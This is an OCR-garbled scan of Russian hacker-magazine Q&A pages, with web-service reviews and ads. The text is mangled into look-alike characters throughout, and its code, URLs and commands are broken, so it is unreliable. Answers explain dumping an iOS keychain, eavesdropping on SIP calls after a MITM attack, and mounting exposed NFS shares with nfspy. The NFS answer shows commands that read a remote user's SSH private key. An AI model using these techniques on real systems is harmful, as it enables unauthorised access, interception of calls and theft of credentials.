ляет собой интерфейс на ЭуіЬоп, второй на 
ЭРиЬу — кому что ближе. К примеру, на 
обвязке для РуіЬоп написано замечатель- 
ное расширение ВигрБиіІе ѵѵЗаІ" ( ЬіІ.Іѵ/ 
КеРРРСі ). позволяющее прямо в Вигр'е 
использовать многочисленные плагины 
фреймворка ѵѵЗаП С помощью последних, 
напомню, реализуется поиск различного 
типа уязвимостей, а в некоторых случаях 
даже эксплуатация. 



Можно ли восстановить забытый 
пароль от ѴѴі-Рі, сохраненный в 
іРІіопе? 

Всевозможные пароли, ключи и 
сертификаты в мобильных устрой- 
ствах Арріе хранятся в зашифрованном виде 
(с индивидуальным для устройства ключом] 
— в специальном защищенном хранилище, 
так называемом КеусЬаіп'е. Но если ты успел 
сделать джейлбрейк (с помощью гесІзпОѵѵ 
или другого инструмента), то вытащить 
пароли не составит труда. В этом нам 
поможет тулза КеусЬаіп-Оитрег ( ЬіІ.Іѵ/ 
кеѵсбаіп сіитрег ]. Это консольное приложе- 
ние придется залить на устройство и 
запустить, подключившись по 55Н. 
Результатом будет вывод дампа всего 
расшифрованного содержимого кеусЬаіп'а в 
удобочитаемом формате. 





В интернете есть много онлайн- 
сервисов для подбора хеш-коллизий. 
Какой из них лучше? 

Сложный вопрос :). Все сервисы 
используют свои собственные базы 
сгенерированных хеш-значений. Наиболее 
подходящим вариантом является проверка 
по нескольким, а в идеале сразу по всем 




□ 



базам. Вручную это, как несложно догадать- 
ся, не очень удобно, поэтому рекомендую 
использовать замечательный пайтон -скрипт 
ІіпсІтуЬазИ [ ЬИ:.1у/Лпс1 тѵЬазЬ ). Получив в 
качестве параметров тип и значение нашего 
хеша, он автоматически проверит наличие 
его в базах без малого пяти десятков 
онлайн-сервисов и при нахождении 
коллизии сообщит результат. Стоит также 
отметить достойный внимания список 
поддерживаемых типов, включающий СІ5С07 
и даже 605Т Р 34.11. 



□ Как можно прослушать голосовой 
разговор, осуществляемый при 
помощи 5ІР-телефонии? 

□ Первое, что требуется сделать, — запо- 
лучить трафик, проведя, например, 
МІТМ-атаку. Так как 5ІР является протоколом 
прикладного уровня, тут ничего нового — все 
точно так же, как и в случае с Ыір. Так что 
будем считать, что ты уже пустил трафик через 
свою машину, — осталось вытащить ѴоІР и 
прослушать разговор. За утилитами далеко 
ходить не придется: все необходимое, 
оказывается, есть во всеми любимом 
ѴѴігезЬагк'е. Запустив прослушивание 
активного интерфейса, открываем инструмент 
ѴоІ Р-саМз из вкладки ТеІерИопу, указываем 



КАКУЮ ЭАѴА5СВІРТ-БИБЛИ0ТЕКУ ВЫБРАТЬ ДЛЯ РАЗРАБОТКИ ИНТЕРФЕЙСА 



Мы уже отвечали на подобный вопрос и гово- 
рили, что для «настольных» проектов можно 
использовать самые разные библиотеки: 
]0иегу ( ]диегу.сот ). Оор ( сіощіооікіі.огд ). Ехі Э5 
( ѵѵѵѵѵѵ.зепсЬа.сот ). МооТооІз ( тооіооіз.пеі ). Для 
мобильных интерфейсов есть свои тяжелове- 
сы: ]0иегу МоЬіІе ( ]диегутоЫ1е.сот ) и БепсЬа 
ТоисЬ ( уууууу.зепсЬа.сот ). Но сегодня, отвечая 
на этот вопрос, я хочу рассказать о менее из- 
вестных решениях. Как правило, они имеют 
скромный размер и быстро загружаются на 
мобильных устройствах. А часть из них даже 
совместимы по синтаксису с ]0иегу. 



2ерІо.І5 

2ер1о]5.сот 

Одна из наиболее богатых на фичи 
библиотек, которая создана специально для 
разработки интерфейсов для і 05 и АпбгоісІ- 
устройств. Она сохраняет большую часть 
из функционала ]0иегу (но, в отличие от 
нее, весит не 32, а всего 8 Кб) и добавляет 
поддержку событий для тачскрина (вклю- 
чая клик для приближения) и очень каче- 
ственную анимацию, реализованную на С55. 
Модульность позволяет подключать только 
те компоненты, которые необходимы для 
каждого конкретного проекта. 



Бпаск.із 

5паск]з.сот 

Небольшая и очень простая библиоте- 
ка, которая идеально подойдет для некрупных 
проектов. При этом в ней есть все необходи- 
мое, чтобы разрабатывать сложные, кроссбра- 
узерные веб-приложения. В отличие от^еріо. 
\ 5 , разработчики в ней полностью отказались 
от іОиегу АРІ, но зато умудрились уместить 
весь код всего в 3 Кб. Правда, анимацию при- 
дется реализовать полностью своими силами. 
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РАСШІЧІТЕО 



интересующий нас сеанс связи и жмем РІауег. 
Все, весь на текущий момент захваченный 
разговор можно декодировать и прослушать 
прямо тут же, практически на лету. 



БОЛЬШОЙ ВОПРОС 



□ У меня есть скрипты на РуІІіоп, 

которые путем хардкорных оптимиза- 
ций, взорвавших мозг нашей команды, 
удалось добиться приемлемой производи- 
тельности. Ценой трех дней работы. А есть 
ли какой-то простой, но эффективный 
способ заставить сценарий на РуІІіоп 
работать быстрее? 

□ Вообще, понятия «производитель- 
ность» и «интерпретируемый язык» 
слабо сочетаются. Затраты на интерпрета- 
цию основательно портят картину произво- 
дительности даже очень хорошо оптимизи- 
рованного РуШоп-приложения. Можно 
попробовать от них избавиться посредством 
ЗіТ-компиляции. Такая возможностьу нас 
появилась благодаря проекту РуРу ( рѵрѵ.огд ). 

Ру Ру — это интерпретатор питона, 
написанный на питоне. И надо признать 
— чертовски быстрый интерпретатор. В 
проекте куча всего интересного (запуск на 
ЗѴМ), но его основная фишка — это, конеч- 
но, использование мощной ЗіТ-компиляции. 
Код, реализованный в слегка ограничен- 
ном подмножестве (к примеру, статической 
типизацией) питона под названием РРуШоп, 
выполняется в некоторых местах чуть ли не 
на порядок быстрее! 0)апдо, запущенный с 
помощью РуРу, работает в 20 раз быстрее 
по сравнению с обычным интерпретатором 
(подробные графики ищи на зреесі.руру.огд ). 
По-моему, неплохие перспективы. 



□ Можно ли добраться до файлов, 
которые расшарены на сервере по 
протоколу ІЧР5 Жеіѵѵогк Рііе Бузіет)? 

□ Если на сервере используется 

реализация ЫР5 до 4-й версии, то да! 
Не вдаваясь в подробности, скажу, что 
протокол имеет уязвимости в протоколе 
аутентификации пользователей, которые 
можно эксплуатировать. Добраться до 



ЕСТЬ ДАМП БАЗЫ ДАННЫХ 
МѴ5СП_, КОТОРАЯ ЗАНИМАЕТ 
5 ГБ. МОЯ ЗАДАЧА — 
ОБРАБОТАТЬ ВСЕ ЗАПИСИ, 
ПРОИЗВЕДЯ НАД КАЖДОЙ ИЗ НИХ 
НЕКОТОРЫЕ ОПЕРАЦИИ. КАК В 
ДОМАШНИХ УСЛОВИЯХ ПРОВЕРНУТЬ 
ЭТО МАКСИМАЛЬНО БЫСТРО? 

Производительность базы 
данных очень часто упирается 
банально в дисковую подси- 
стему. Поэтому когда нужно сделать 
быстро и много каких-то тяжелых в 
этом плане операций над базой, луч- 
ше всего временно перенести базу на 
какой-нибудь сверхбыстрый диск. Это, 
конечно, может быть 550 (к примеру, 
ОС 1 РеѵоОгіѵе дает до 1800 Мб/с на 





последовательное чтение), но лучше 
использовать классический РАМ- 
диск. Операции сложного каскадного 
удаления, апдейта да и вообще чего 
угодно в оперативной памяти будут 
выполняться иногда едва ли не на три 
порядка быстрее (до 6000 Мб/с на ран- 
домную запись, кактебе?). РАМ-диск 
в винде легко поднимается с помощью 
бесплатной утилиты ІтОізк Ѵігіиаі 
Оівк йгіѵег ( доо.дІ/ѵѵІОРЦ . потом на 
него переносятся файлы БД, система 
настраивается (в Му5СН_ указывается 
--сЫа-сІіг), и можно радоваться в сот- 
ни раз возросшей производительно- 
сти. Главное, чтобы у тебя было пять 
свободных гигабайт в памяти ;). Но с 
текущими ценами на оперативку это 
не такая уж большая проблема. 




Скорость чтения и записи на РАМ-диск буквально зашкаливает! Не использовать такую возможность просто 
глупо! 



ДЛЯ МОБИЛЬНЫХ УСТРОЙСТВ? 



$сІот 

діІіЬиЬ.сот/іиІіепѵѵ/сІоІІагсІот/ 

Эта библиотека еще меньше: весь код 
в упакованном виде занимает всего 2,3 Кб. 
$сІот поддерживает совместимость с разными 
браузерами и анимацию, однако многие из 
привычных вещей (например, АЗАХ) придется 
реализовывать руками. Идеально подходит 
для тех случаев, когда время отклика нужно 
сократить до минимума: небольшой размер 
библиотеки может помочь выиграть нужные 
миллисекунды. 



ХІІІ.І5 

хиуз.сот 

Крохотный фреймворкдля создания 
мобильных приложений на НТМБ5. Он работает 
практически на всех устройствах и в особен- 
ности хорошо себя чувствует в браузерах на 
базе ѴѴеЬКіГ В хищз изначально встроена 
поддержка событий, связанных стачдиспле- 
ем. В качестве синтаксиса используется свой 
подход, однако специальный плагин может 
обеспечить совместимость с )0иегу. 




140тесІІеу 

діШиЬ.сот/Ьоп2а/140тесІ1еѵ 

В заключение мы не можем не упо- 
мянуть эту библиотеку. Всего в 0,5 Кб ее соз- 
датели умудрились запихнуть массу готовых 
снипетов, полезных при разработке кода на 
35. Идея родилась под впечатлением от за- 
бавного конкурса 140Ьу1ез, где участникам 
необходимо было оформить полезные функции 
в виде коротких твит-сообщений. 140тесІІеу 
поддерживает шаблоны, обработку событий и 
даже АЗАХ. 
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ІЖІТБ/РАСНІМТЕО 



расшаренных по І\ІР5 файлов позволяет, в 
частности, утилита Ш5ру ( дШніЬ.сот/ 

Ьопзаіѵікіпд/ШБрѵ ). 

Предположим, что І\ІР5-сервер находится 
по адресу 192.168.1.124. Смотрим шары: 

$ збошіоипі: -е 192.168.1.124 
ЕхрогТ 1І5І -Рог 192.168.1.124: 

/Ноте (еѵегуопе) 

Благодаря Ш5ру подключение расша- 
ренного каталога /Ноте выполняется одной 
командой: 

зисіо п-Рзру -о 5егѵеп=192. 168. 1.124: 
/Ноте . Нісіе . аііоы оііііег . го . іпііг /тгтС 

Теперь пробуем посмотреть файлы на 
удаленной машине: 

$ ссі /тпі: 

/тп1:$ І5 
зтіІіНз 

/тп1:$ ссі зтіІіНі 
/тп1:/5ті1:Нз$ саТ . ббіі/ісі . гза 
ВЕСІІМ К5А РКІѴАТЕ КЕУ 



Вуаля — доступ к удаленным файлам 
получен. 



за пять долларов в месяцев. Однако на днях 
выяснилось страшное: один из серверов 
(крутился на ІІЬипІи) хостинга был взломан, 
а злоумышленник внес изменения в 
некоторые из сайтов. Причем это было 
реализовано довольно давно, и никто, 
включая меня, не чувствовал подвоха. 
Соответственно, теперь ищу средство, 
которое постоянно бы отслеживало 
целостность файлов и предупреждало меня 
в случае каких-либо изменений. 



его с нужной периодичностью через Сгоп. В 
частности, так сделал известный исследова- 
тель безопасности I гопдеек, сайт которого 
также недавно поломали. В своем блоге [ЬМ:. 
1у/Кр5б|Р ) он выложил простой сценарий, 
который пробегает по нужным директориям и 
вычисляет тсІ5-хеш для всех файлов. Если с 
момента прошлой проверки какие-то файлы 
изменились, то на заданный е-таіі отправля- 
ется предупреждение. Еще более крутым 
решением является утилита АгІіІІегу ( ѵѵѵѵѵѵ. 
веста п іас.сот/сі оѵѵп ІоасП . разработанная на 
РуіЬоп специально для Ыпих-систем. Она 
мониторит файловую систему на наличие 
изменений, а заодно защищает сервер от 
брутфорса 55Н и автоматически добавляет в 
блэк-лист файрвола ІР-шники, с которых идет 
сканирование портов. Настройка мониторин- 
га осуществляется через простой конфиг: 

# Включить мониторинг или отключить 

МОІМІТОК=ІМО 



В принципе, ничего не стоит написать 
подобный скоипт самому и запускать 



До недавнего времени я размещал 
свой сайт на самом обычном хостинге 



# 

# Папк и для мони торинга 
МОМІТОК_РОІРЕК5="/ѵаг/^лДлДл/" , "/еіс/" 

# 

# Частота проверки 

моміток^кЕО>иЕі\ісѵ=б0 

# 

# Файлы и папки, которые не нужно 

мониторить. Например: /еТс/разБысІ., /еТс/ 
бозТБ.аПом 

ЕХСІ_ІЮЕ= 



□ Нужно расковырять одно веб- 
приложение, которое использует 
просто чудовищное количество кода на ^ 
для реализации интерфейса. Но даже 
разобраться, какой код выполняется по 
определенному событию (например, клику 
по изображению), — и то проблема. На 
анализ уходит масса времени, не спасают 
даже встроенные средства разработчика 
в боодіе СІіготе. Как упростить себе жизнь? 
Без сложного кода на 35 сейчас не 
обходится ни один мало-мальски 
серьезный веб-проект, поэтому нужно 
привыкать и приспосабливаться. Чтобы 
лучше понимать, какие действия и какой код 
выполняется при наступлении определенных 
событий, крайне рекомендую установить для 
СЬготе аддон ѴізиаІ Еѵепі ( Ыі.1ѵ/ККдК8и ). 
Один клик — и для каждого элемента 
страницы наглядно отобразятся обработчи- 
ки, которые с ним связаны. Наводим мышку 
— и видим код обработчика. 

Раньше не мог даже представить 
такой ситуации, но в ОтаіІ закончи- 
лось все дисковое пространство. В ящике 
много писем с большими аттачами, и искать 
их вручную лениво. Как это автоматизиро- 
вать? 

Знакомая ситуация :). Самое простое 
решение — воспользоваться специаль- 
ным сервисом вроде ѵѵѵѵѵѵЧіпсІЬідтаіІ.сот . Он 

все сделает в лучшем виде и позволит сразу 
удалить все ненужные и «тяжелые» письма. 
Для работы сервис, само собой, попросит 
доступ к твоему аккаунту через механизм 
аутентификации ОАиіЬ. Страшно, но токен, 
выданный сервису, ты всегда можешь 
отозвать в настройках своего аккаунта. Если 
же даже на время доверять доступ к своему 
ящику нет никакого желания (и тут я тебя 
очень понимаю), можно решить проблему с 
помощью скрипта для боодіе босз: 

1. Создаем копию документа ( ЬіІ.Іѵ/І РУКх8 ). 

2 . В меню выбираем «ОтаіІ -> Резеі Сапѵаз». 

3. Даем согласие на авторизацию скрипта (мы 
не даем доступ третьим лицам). 

4 . Нажимаем в меню«бтаіІ -> 5сап МаіІЬох». 

В результате таблица боодіе босз запол- 
нится данными о письмах, к которым при- 
креплен крупный аттач. Код сценария легко 
посмотреть: ничего налево он не отправляет. 
Поиск больших писем осуществляется через 
специальный объект бтаіІАрр: 




□ 





Вигр ЗиЛе — один из лучших инструментов для анализа 
взаимодействия бразуера и веб-приложения 



ѵаг ІіІігеасІБ = бтаіІАрр. 5еагсІі( 

' Маз :а1:1:асИтеп1: зТагІ:., 100); 
і-р ( 1=ІігеасІ5.1еп§1=Іі == 0)^( 

ББ.ІгоаБІіО'РгосеББесІ " + зТагІ: + 

" тезза^еБ . " . "Бсаппіп^ Ропе", -1); 
геТигп ; 

ь_ 

К слову, если тебе нужно произвести 
какие-то более сложные действия со своим 
ящиком (например, сделать робот, который 
будет отвечать на определенные письма), то 
это отлично реализуется через тот же боодіе 
Аррз бсгірі. 



□ Раньше в каждом профиле твитера 
был К55-фид, с помощью которого 
было удобно собирать данные и определен- 
ным образом их обрабатывать и группиро- 
вать. Теперь по какой-то непонятной 
причине такой возможности нет! Но 
автоматически подгружать контент из 
твитера надо. Как быть? 

□ На самом деле Р55-фид никуда не 
делся. К примеру, для аккаунта (б 
ХакерРІІ это ЬирзѴЛѵѵіиег.сот/зіаІизез/изег 
1ітеІіпе/64728205.г55 . Собственно, сложность 
только в получении цифрового идентификато- 
ра. Чтобы его узнать, нужно открыть исходник 
страницы нужного Тѵѵіиег-аккаунта, найти там 
сііѵ, содержащий атрибут сіаіа- изег-ісі, — это и 
есть то, что нам нужно. 



□ Как по номеру сотового телефона 
определить, к какому региону он 
относится? 

□ Каждый сотовый оператор имеет свои 
емкости номеров (цифры вроде 903, 910 
в самом начале номера), для каждого региона 
они разные. Какая емкость кому принадлежит 
и в каком регионе, не секрет: информация 
доступна на сайте Россвязи ( гоззууаг.ги/ 
асііѵііѵ/пит гезигз/гедізіегМит ). Но 
ковыряться с документацией необязательно, 
потому что предприимчивые ребята давно 
сварганили удобный сервис: іппит.ги/арі/ 
ууЬо оѵѵпег.ЫтІ . Кстати, его можно использо- 
вать автоматически, обращаясь к нему как к 
АРІ. На запрос іппит.ги/сді-Ьіп/іпІю. 
рІ?питЬег=<номер телефона> будет возвра- 
щаться отчет в ХМІ_. □С 
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4.4.10 Бтріауег 0.8.0 Тог 0.2.2.35 














Зігеатѵѵпіег 4.0. 0.1 Мигегсоге 1.2 РгасІ 2.2 Регіап 1.2.3 

5ѵуІ5іі 0.6.0 ІМстрсрр 0.5.10 Ра.2 ЗаІеіуЗаЬЬег 

ТегаТегт Рго ѴѴеЬ 3.1.3 РШѵі 0.15.0 ЗатЬаіп 3.0.3 ТепіоигЬігсІ 10.0.3 

ТогсЬаі 0.9.9 0x1 ІдгаЬ 0.4.4.гс1 ОіеНап/егІег 2.2 ТехМ/гапдІег 4.0 






ІЖІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 




Персональный тренер и гид по пешим и велосипедным прогулкам 
натвоемсмартфоне 



6ІРІ5 



дір-іг 

Сколько километров ты пробежишь за это лето? Раз уж на дворе июнь, не могу не рас- 
сказать о сервисе, связанном не с твоей работой за экраном монитора, а с деятельно- 
стью на свежем воздухе. біріз, по сути, персональный тренер, который поможет тебе 
в тренировках и поиске новых маршрутов для прогулок, пробежек или, что важно лично 
для меня, езды на велике. На смартфон (АпсІгоісІ/іРЬопе) предлагается установить 
приложение, которое по команде начинает отлеживать твои перемещения: маршрут, 
скорость, расстояние и так далее. Вся статистика «достижений» сохраняется в профи- 
ле — при желании ты можешь ее расшарить своим друзьям. Эта социальная составляю- 
щая очень полезна, так как позволяет даже просто через браузер найти для себя новые 
интересные маршруты. Да и стимулирует неплохо :). 



РШ5МАТІС 



деіргізтаііс.сот 

Я и раньше видел сервисы, которые анализируют твои новостные ленты и твиты 
друзей, выстраивая поток информации в удобном виде — к примеру, заверстывая 
всю собранную информацию как газету. Но Ргізтаііс обскакал их всех: во-первых, 
по качеству объединения твитов на одну и ту же тему, во-вторых, по фильтрации всей 
новостной ленты на тематические категории и, в-третьих, по поиску для тебя новых 
источников информации. В результате ты получаешь классно оформленные и агреги- 
рованные в одном месте новости в соответствии с твоими интересами и твитами твоих 
друзей. Если ты читаешь иностранные ресурсы, очень рекомендую. 

Интеллектуальное построение длятебя новостной ленты, исходя изтви- 
тов твоих друзей и обозначенных интересов. Сервис пока в закрытом 
бета-тестировании, но на инвайты создатели нежадничают 





Чтобы не читать скучный хелпѴіт'а, освой этот консольный текстовый 
редактор с помощью игры — гораздо проще и приятнее 



ѴІМ А0ѴЕМТІІРЕ5 



ѵіт-асіѵепіигез.сот 

Еще один ѵѵоѵѵ! Я знаю немало людей, которые не умеют пользоваться текстовым ре- 
дактором Ѵіт. Он не похож на другие редакторы, так как работает в консоли и управ- 
ляется с помощью набора специальных команд. Сходу, не прочитав хелпа, начать 
работать в нем невозможно. При этом он зачастую является единственным в све- 
жеустановленной системе. Что такое ѴІМ Асіѵепіигез? Это онлайн-игрушка, которая 
в доступнейшей форме квеста позволяет освоить горячие клавиши и команды Ѵіт так, 
что после ее прохождения с легендарным текстовым редактором под *піх у тебя уже не 
возникнет проблем. Пройти ее нужно обязательно: управляться с Ѵіт должен любой 
уважающий себя ІТ-шник. В один прекрасный день это непременно пригодится. 



2ЕР0ВІИ 



зеЬзаиѵаде.пеі/разіе 

Сегодня, когда ни дня не проходит, чтобы кто-нибудь не выложил в Сеть базу данных 
пользователей очередной компании, исходники известного продукта (например, ан- 
тивируса или решения для виртуализации) или какую-то еще конфиденциальную ин- 
формацию, стали бешено популярны сервисы для хранения кода вроде разіеЫп.сот . 
Последний вообще стал де-факто площадкой для слива данных. 2егоВіп же — это 
полный аналог «паст-бина», но, помимо хранения данных, обеспечивает их шифрова- 
ние с помощью алгоритма АЕ5 и предоставляет возможность обсуждения. Исходники 
проекта полностью открыты, так что такой сервис ты можешь поднять и сам. 

Полный аналог імІеЫгьсот (хранение снипеюв кода итекстовыхза- 
меток) с поддержкой шифрования. Другие похожие проекты: 

разіесгѵрі.сот.зеііпкесі.сот 
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на правах рекламы 







Оформитъ дебетовую или кредитную «Мужскую карту» 
можно на сайте уѵѵѵѵѵ-аІГаЬапк.ги или позвонив 
по телефонам: 

(495) 229-2222 в Москве 

8-800-333-2-333 в регионах России (звонок бесплатный) 



МАХІМ 

ЖГМ?І№Ч ЖтЧАА С Ш"№ІЦ"І 



А Альфа Банк (дате)Іапб 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 29.01.1998 №1326" 





Шіхатонкий намек 

на превосходство НоутбукиЗатзипд [51 ІЛ.ТРА 



Первый в мире ультрабук с технологией ЕхргеззСасбе™, который сочетает емкость НЮй со скоростью 53й! 
Готовность к работе за 2 секунды, загрузка за 20 секунд, запуск программ в два раза быстрее! 1 

Сотни гигабайт дискового пространства, процессор Іпіеі® Соге™ І5 второго поколения, игровая видеокарта 
Пабеоп™, оптический привод, сверхъяркий антибликовый экран с І_ЕО-подсветкой 2 — и всё это в корпусе 
из фибергласса и алюминия, который на четверть легче и в полтора раза тоньше обычного ноутбука 3 . 



ШгаЬоок Вдохновлен Іпіеі®. 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, Іпіеі Соге, ШІгаЬоок и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США 
и других стран. Для получения дополнительной информации о рейтинге процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ. іпіеі. ги/гаііпд. 




Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ш/ѵѵ.затзипд.сот Товар сертифицирован. Реклама. 
1 Скорость зависит от конфигурации ноутбука и установленных приложений. 2 Характеристики зависят от конфигурации ноутбука. 
3 По сравнению с ноутбуками Затзипд серии КѴ520. ІЛІга - ультра. 









Узнайте больше о новинке в Г алерее Затзипд 

Москва, ул. Тверская, д. 22 




